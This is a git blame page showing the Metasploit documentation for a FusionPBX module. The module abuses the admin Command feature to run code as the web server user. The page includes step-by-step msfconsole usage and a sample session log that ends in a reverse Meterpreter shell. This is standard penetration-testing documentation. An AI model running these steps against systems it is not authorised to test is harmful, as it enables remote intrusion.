adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
6d9d9a70d410cc94de4d3d9afd7a75cd426d43be
metasploit-gs/documentation/modules/exploit/unix/webapp/fusionpbx_exec_cmd_exec.md
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

84 lines
2.1 KiB
Markdown
Raw Normal View History

Add documentation
2019-11-01 23:38:59 +00:00
## Description
This module uses administrative functionality available in FusionPBX
to gain a shell.
The Command section of the application permits users with `exec_view`
permissions, or superadmin permissions, to execute arbitrary system
commands, or arbitrary PHP code, as the web server user.
## Vulnerable Software
This module has been tested successfully on FusionPBX version
4.4.1 on Ubuntu 19.04 (x64).
Software:
Update documentation
2019-11-02 22:37:56 +00:00
* https://www.fusionpbx.com/download
Add documentation
2019-11-01 23:38:59 +00:00
* https://github.com/fusionpbx/fusionpbx/releases
## Verification Steps
1. Start `msfconsole`
2. Do: `use exploit/unix/webapp/fusionpbx_exec_cmd_exec`
3. Do: `set rhosts <IP>`
Update documentation
2019-11-02 22:37:56 +00:00
4. Do: `set username <username>` (default: `admin`)
5. Do: `set password <password>`
6. Do: `run`
7. You should get a new session
Add documentation
2019-11-01 23:38:59 +00:00
## Options
**TARGETURI**
The base path to FusionPBX (default: `/`)
**USERNAME**
The username for FusionPBX (default: `admin`)
**PASSWORD**
The password for FusionPBX
## Scenarios
```
Updates msf5 as well
2025-07-17 11:51:29 +01:00
msf > use exploit/unix/webapp/fusionpbx_exec_cmd_exec
msf exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set rhosts 172.16.191.214
Add documentation
2019-11-01 23:38:59 +00:00
rhosts => 172.16.191.214
Updates msf5 as well
2025-07-17 11:51:29 +01:00
msf exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set username admin
Add documentation
2019-11-01 23:38:59 +00:00
username => admin
Updates msf5 as well
2025-07-17 11:51:29 +01:00
msf exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set password PXRtwZqSkvToC4gc
Add documentation
2019-11-01 23:38:59 +00:00
password => PXRtwZqSkvToC4gc
Updates msf5 as well
2025-07-17 11:51:29 +01:00
msf exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set lhost 172.16.191.165
Add documentation
2019-11-01 23:38:59 +00:00
lhost => 172.16.191.165
Updates msf5 as well
2025-07-17 11:51:29 +01:00
msf exploit(unix/webapp/fusionpbx_exec_cmd_exec) > show targets
Add documentation
2019-11-01 23:38:59 +00:00
Exploit targets:
Id Name
-- ----
0 Automatic (PHP In-Memory)
1 Automatic (Unix In-Memory)
2 Automatic (Linux Dropper)
Updates msf5 as well
2025-07-17 11:51:29 +01:00
msf exploit(unix/webapp/fusionpbx_exec_cmd_exec) > run
Add documentation
2019-11-01 23:38:59 +00:00
[*] Started reverse TCP handler on 172.16.191.165:4444
[+] Authenticated as user 'admin'
[*] Sending payload (1115 bytes) ...
[*] Sending stage (38288 bytes) to 172.16.191.214
[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.214:60772) at 2019-11-01 19:25:43 -0400
meterpreter > getuid
Server username: www-data (33)
meterpreter >
```
Reference in New Issue Copy Permalink